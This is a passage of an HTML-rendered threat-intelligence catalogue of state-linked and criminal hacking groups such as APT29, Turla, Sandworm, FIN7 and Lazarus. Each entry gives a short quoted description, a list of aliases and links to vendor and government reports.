<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/">http://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt_29"><a class="anchor" href="#_apt_29"></a><a class="link" href="#_apt_29">APT 29</a></h3>
<div class="paragraph">
<p>A 2015 report by F-Secure describe APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States;Asian, African, and Middle Eastern governments;organizations associated with Chechen extremism;and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large - scale spear - phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash - and - grab approach involving a fast but noisy breakin followed by the rapid collection and exfiltration of as much data as possible.If the compromised target is discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long - term intelligence gathering '</p>
</div>
<div class="paragraph">
<p>APT 29 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dukes</p>
</li>
<li>
<p>Group 100</p>
</li>
<li>
<p>Cozy Duke</p>
</li>
<li>
<p>CozyDuke</p>
</li>
<li>
<p>EuroAPT</p>
</li>
<li>
<p>CozyBear</p>
</li>
<li>
<p>CozyCar</p>
</li>
<li>
<p>Cozer</p>
</li>
<li>
<p>Office Monkeys</p>
</li>
<li>
<p>OfficeMonkeys</p>
</li>
<li>
<p>APT29</p>
</li>
<li>
<p>Cozy Bear</p>
</li>
<li>
<p>The Dukes</p>
</li>
<li>
<p>Minidionis</p>
</li>
<li>
<p>SeaDuke</p>
</li>
<li>
<p>Hammer Toss</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2416. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/">https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf">https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html">https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_turla_group"><a class="anchor" href="#_turla_group"></a><a class="link" href="#_turla_group">Turla Group</a></h3>
<div class="paragraph">
<p>A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'</p>
</div>
<div class="paragraph">
<p>Turla Group is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Turla</p>
</li>
<li>
<p>Snake</p>
</li>
<li>
<p>Venomous Bear</p>
</li>
<li>
<p>Group 88</p>
</li>
<li>
<p>Waterbug</p>
</li>
<li>
<p>WRAITH</p>
</li>
<li>
<p>Turla Team</p>
</li>
<li>
<p>Uroburos</p>
</li>
<li>
<p>Pfinet</p>
</li>
<li>
<p>TAG_0530</p>
</li>
<li>
<p>KRYPTON</p>
</li>
<li>
<p>Hippo Team</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2417. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf">https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.circl.lu/pub/tr-25/">https://www.circl.lu/pub/tr-25/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.theguardian.com/technology/2014/aug/07/turla-hackers-spying-governments-researcher-kaspersky-symantec">https://www.theguardian.com/technology/2014/aug/07/turla-hackers-spying-governments-researcher-kaspersky-symantec</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf">https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/65545/the-epic-turla-operation/">https://securelist.com/analysis/publications/65545/the-epic-turla-operation/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-control-in-the-sky/">https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-control-in-the-sky/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/67962/the-penquin-turla-2/">https://securelist.com/blog/research/67962/the-penquin-turla-2/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/">https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_energetic_bear"><a class="anchor" href="#_energetic_bear"></a><a class="link" href="#_energetic_bear">Energetic Bear</a></h3>
<div class="paragraph">
<p>A Russian group that collects intelligence on the energy industry.</p>
</div>
<div class="paragraph">
<p>Energetic Bear is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dragonfly</p>
</li>
<li>
<p>Crouching Yeti</p>
</li>
<li>
<p>Group 24</p>
</li>
<li>
<p>Havex</p>
</li>
<li>
<p>CrouchingYeti</p>
</li>
<li>
<p>Koala Team</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2418. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/">http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf">http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.netresec.com/?page=Blog&amp;month=2014-10&amp;post=Full-Disclosure-of-Havex-Trojans">http://www.netresec.com/?page=Blog&amp;month=2014-10&amp;post=Full-Disclosure-of-Havex-Trojans</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://threatpost.com/energy-watering-hole-attack-used-lightsout-exploit-kit/104772/">https://threatpost.com/energy-watering-hole-attack-used-lightsout-exploit-kit/104772/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sandworm"><a class="anchor" href="#_sandworm"></a><a class="link" href="#_sandworm">Sandworm</a></h3>
<div class="paragraph">
<p>Sandworm is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sandworm Team</p>
</li>
<li>
<p>Black Energy</p>
</li>
<li>
<p>BlackEnergy</p>
</li>
<li>
<p>Quedagh</p>
</li>
<li>
<p>Voodoo Bear</p>
</li>
<li>
<p>TEMP.Noble</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2419. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.isightpartners.com/2014/10/cve-2014-4114/">http://www.isightpartners.com/2014/10/cve-2014-4114/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.isightpartners.com/2016/01/ukraine-and-sandworm-team/">http://www.isightpartners.com/2016/01/ukraine-and-sandworm-team/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://dragos.com/blog/crashoverride/CrashOverride-01.pdf">https://dragos.com/blog/crashoverride/CrashOverride-01.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-163A">https://www.us-cert.gov/ncas/alerts/TA17-163A</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid">https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_telebots"><a class="anchor" href="#_telebots"></a><a class="link" href="#_telebots">TeleBots</a></h3>
<div class="paragraph">
<p>We will refer to the gang behind the malware as TeleBots. However its important to say that these attackers, and the toolset used, share a number of similarities with the BlackEnergy group, which conducted attacks against the energy industry in Ukraine in December 2015 and January 2016. In fact, we think that the BlackEnergy group has evolved into the TeleBots group.</p>
</div>
<div class="paragraph">
<p>TeleBots is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sandworm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2420. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/">http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_anunak"><a class="anchor" href="#_anunak"></a><a class="link" href="#_anunak">Anunak</a></h3>
<div class="paragraph">
<p>Groups targeting financial organizations or people with significant financial assets.</p>
</div>
<div class="paragraph">
<p>Anunak is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Carbanak</p>
</li>
<li>
<p>Carbon Spider</p>
</li>
<li>
<p>FIN7</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2421. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Carbanak">https://en.wikipedia.org/wiki/Carbanak</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf">https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://2014.zeronights.ru/assets/files/slides/ivanovb-zeronights.pdf">http://2014.zeronights.ru/assets/files/slides/ivanovb-zeronights.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks">https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.cyber4sight.com/2017/04/similarities-between-carbanak-and-fin7-malware-suggest-actors-are-closely-related/">https://blog.cyber4sight.com/2017/04/similarities-between-carbanak-and-fin7-malware-suggest-actors-are-closely-related/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor">https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns">https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_teamspy_crew"><a class="anchor" href="#_teamspy_crew"></a><a class="link" href="#_teamspy_crew">TeamSpy Crew</a></h3>
<div class="paragraph">
<p>TeamSpy Crew is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TeamSpy</p>
</li>
<li>
<p>Team Bear</p>
</li>
<li>
<p>Berserk Bear</p>
</li>
<li>
<p>Anger Bear</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2422. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/35520/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/">https://securelist.com/blog/incidents/35520/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_buhtrap"><a class="anchor" href="#_buhtrap"></a><a class="link" href="#_buhtrap">BuhTrap</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2423. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2015/11/11/operathion-buhtrap-malware-distributed-via-ammyy-com/">http://www.welivesecurity.com/2015/11/11/operathion-buhtrap-malware-distributed-via-ammyy-com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_berserk_bear"><a class="anchor" href="#_berserk_bear"></a><a class="link" href="#_berserk_bear">Berserk Bear</a></h3>
</div>
<div class="sect2">
<h3 id="_wolf_spider"><a class="anchor" href="#_wolf_spider"></a><a class="link" href="#_wolf_spider">Wolf Spider</a></h3>
<div class="paragraph">
<p>Wolf Spider is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FIN4</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_boulder_bear"><a class="anchor" href="#_boulder_bear"></a><a class="link" href="#_boulder_bear">Boulder Bear</a></h3>
<div class="paragraph">
<p>First observed activity in December 2013.</p>
</div>
</div>
<div class="sect2">
<h3 id="_shark_spider"><a class="anchor" href="#_shark_spider"></a><a class="link" href="#_shark_spider">Shark Spider</a></h3>
<div class="paragraph">
<p>This group&#8217;s activity was first observed in November 2013. It leverages a banking Trojan more commonly known as Shylock which aims to compromise online banking credentials and credentials related to Bitcoin wallets.</p>
</div>
</div>
<div class="sect2">
<h3 id="_union_spider"><a class="anchor" href="#_union_spider"></a><a class="link" href="#_union_spider">Union Spider</a></h3>
<div class="paragraph">
<p>Adversary targeting manufacturing and industrial organizations.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2424. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf">http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_silent_chollima"><a class="anchor" href="#_silent_chollima"></a><a class="link" href="#_silent_chollima">Silent Chollima</a></h3>
<div class="paragraph">
<p>Silent Chollima is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OperationTroy</p>
</li>
<li>
<p>Guardian of Peace</p>
</li>
<li>
<p>GOP</p>
</li>
<li>
<p>WHOis Team</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2425. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf">http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lazarus_group_2"><a class="anchor" href="#_lazarus_group_2"></a><a class="link" href="#_lazarus_group_2">Lazarus Group</a></h3>
<div class="paragraph">
<p>Since 2009, HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims; some intrusions have resulted in the exfiltration of data while others have been disruptive in nature. Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace. Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware. Variants of malware and tools used by HIDDEN COBRA actors include Destover, Duuzer, and Hangman.</p>
</div>
<div class="paragraph">
<p>Lazarus Group is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Operation DarkSeoul</p>
</li>
<li>
<p>Dark Seoul</p>
</li>
<li>
<p>Hidden Cobra</p>
</li>
<li>
<p>Hastati Group</p>
</li>
<li>
<p>Andariel</p>
</li>
<li>
<p>Unit 121</p>
</li>
<li>
<p>Bureau 121</p>
</li>
<li>
<p>NewRomanic Cyber Army Team</p>
</li>
<li>
<p>Bluenoroff</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2426. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://threatpost.com/operation-blockbuster-coalition-ties-destructive-attacks-to-lazarus-group/116422/">https://threatpost.com/operation-blockbuster-coalition-ties-destructive-attacks-to-lazarus-group/116422/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-164A">https://www.us-cert.gov/ncas/alerts/TA17-164A</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/lazarus-under-the-hood/77908/">https://securelist.com/lazarus-under-the-hood/77908/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf">http://www.mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity">https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-318A">https://www.us-cert.gov/ncas/alerts/TA17-318A</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-318B">https://www.us-cert.gov/ncas/alerts/TA17-318B</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_viceroy_tiger"><a class="anchor" href="#_viceroy_tiger"></a><a class="link" href="#_viceroy_tiger">Viceroy Tiger</a></h3>
<div class="paragraph">
<p>Viceroy Tiger is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Appin</p>
</li>
<li>
<p>OperationHangover</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2427. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf">http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pizzo_spider"><a class="anchor" href="#_pizzo_spider"></a><a class="link" href="#_pizzo_spider">Pizzo Spider</a></h3>
<div class="paragraph">
<p>Pizzo Spider is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DD4BC</p>
</li>
<li>
<p>Ambiorx</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_corsair_jackal"><a class="anchor" href="#_corsair_jackal"></a><a class="link" href="#_corsair_jackal">Corsair Jackal</a></h3>
<div class="paragraph">
<p>Corsair Jackal is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TunisianCyberArmy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2428. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/regional-conflict-and-cyber-blowback/">https://www.crowdstrike.com/blog/regional-conflict-and-cyber-blowback/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_snowglobe"><a class="anchor" href="#_snowglobe"></a><a class="link" href="#_snowglobe">SNOWGLOBE</a></h3>
<div class="paragraph">
<p>In 2014, researchers at Kaspersky Lab discovered and reported on three zero-days that were being used in cyberattacks in the wild. Two of these zero-day vulnerabilities are associated with an advanced threat actor we call Animal Farm. Over the past few years, Animal Farm has targeted a wide range of global organizations. The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007.</p>
</div>
<div class="paragraph">
<p>SNOWGLOBE is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Animal Farm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2429. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/69114/animals-in-the-apt-farm/">https://securelist.com/blog/research/69114/animals-in-the-apt-farm/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france">https://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.cyphort.com/evilbunny-malware-instrumented-lua/">http://www.cyphort.com/evilbunny-malware-instrumented-lua/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/">http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.gdatasoftware.com/blog/article/babar-espionage-software-finally-found-and-put-under-the-microscope.html">https://blog.gdatasoftware.com/blog/article/babar-espionage-software-finally-found-and-put-under-the-microscope.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deadeye_jackal"><a class="anchor" href="#_deadeye_jackal"></a><a class="link" href="#_deadeye_jackal">Deadeye Jackal</a></h3>
<div class="paragraph">
<p>The Syrian Electronic Army (SEA) is a group of computer hackers which first surfaced online in 2011 to support the government of Syrian President Bashar al-Assad. Using spamming, website defacement, malware, phishing, and denial of service attacks, it has targeted political opposition groups, western news organizations, human rights groups and websites that are seemingly neutral to the Syrian conflict. It has also hacked government websites in the Middle East and Europe, as well as US defense contractors. As of 2011 the SEA has been <strong>the first Arab country to have a public Internet Army hosted on its national networks to openly launch cyber attacks on its enemies</strong>. The precise nature of SEA&#8217;s relationship with the Syrian government has changed over time and is unclear</p>
</div>
<div class="paragraph">
<p>Deadeye Jackal is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SyrianElectronicArmy</p>
</li>
<li>
<p>SEA</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2430. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Syrian_Electronic_Army">https://en.wikipedia.org/wiki/Syrian_Electronic_Army</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_operation_c_major"><a class="anchor" href="#_operation_c_major"></a><a class="link" href="#_operation_c_major">Operation C-Major</a></h3>
<div class="paragraph">
<p>Group targeting Indian Army or related assets in India. Attribution to a Pakistani connection has been made by TrendMicro.</p>
</div>
<div class="paragraph">
<p>Operation C-Major is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>C-Major</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2431. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf">http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
